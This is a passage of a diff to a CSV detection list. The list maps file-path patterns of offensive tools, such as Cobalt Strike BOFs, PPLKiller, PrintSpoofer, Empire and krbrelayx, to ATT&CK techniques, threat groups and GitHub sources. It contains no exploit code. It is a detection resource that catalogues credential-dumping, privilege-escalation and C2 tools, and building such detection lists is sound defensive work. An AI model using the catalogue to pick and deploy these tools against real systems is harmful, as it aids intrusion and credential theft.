TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*/powershell_executor/*.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" -"*/PowershellKerberos.git*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*/PowershellKerberos.git*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*/PowerShx.git*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" -"*/PowerTools*","offensive_tool_keyword","empire","Empire power tools like powerview powerbreach powerpick powerup","T1003 - T1078 - T1059 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Information Gathering","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","1931","826","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z" +"*/PowerTools*","offensive_tool_keyword","empire","Empire power tools like powerview powerbreach powerpick powerup","T1003 - T1078 - T1059 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Information Gathering","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","1932","825","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z" "*/PowerView.cna*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*/PowerView.ps1*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" "*/PowerView3.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" @@ -4779,98 +4824,100 @@ "*/PPLBlade.git*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*/ppldump.*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*/PPLDump_BOF/*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" -"*/PPLFault/*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*/PPLKiller.git*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" -"*/PPLKiller/*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*/PPLFault/*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*/PPLKiller.git*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*/PPLKiller/*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*/pptp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/prepare.sh shell/mod_*.htaccess*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "*/PrimusC2*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" "*/PrimusC2.git*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" -"*/printerbug.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" -"*/PrintMonitorDll.*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" -"*/PrintMonitorDll/*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","222","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" -"*/PrintSpoofer.git*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" -"*/PrintSpoofer.git*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*/printerbug.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*/PrintMonitorDll.*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*/PrintMonitorDll/*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*/printnightmare.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/PrintSpoofer.git*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*/PrintSpoofer.git*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","1","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*/PrintSpoofer/*","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","1","N/A","10","10","76","8","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" "*/Priv_Esc.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" -"*/privesc/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*/privesc/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/PrivescCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*/PrivExchange*","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*/PrivExchange.git*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*/PrivFu.git*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" -"*/PrivilegeEscalation/*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/PrivilegeEscalation/*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 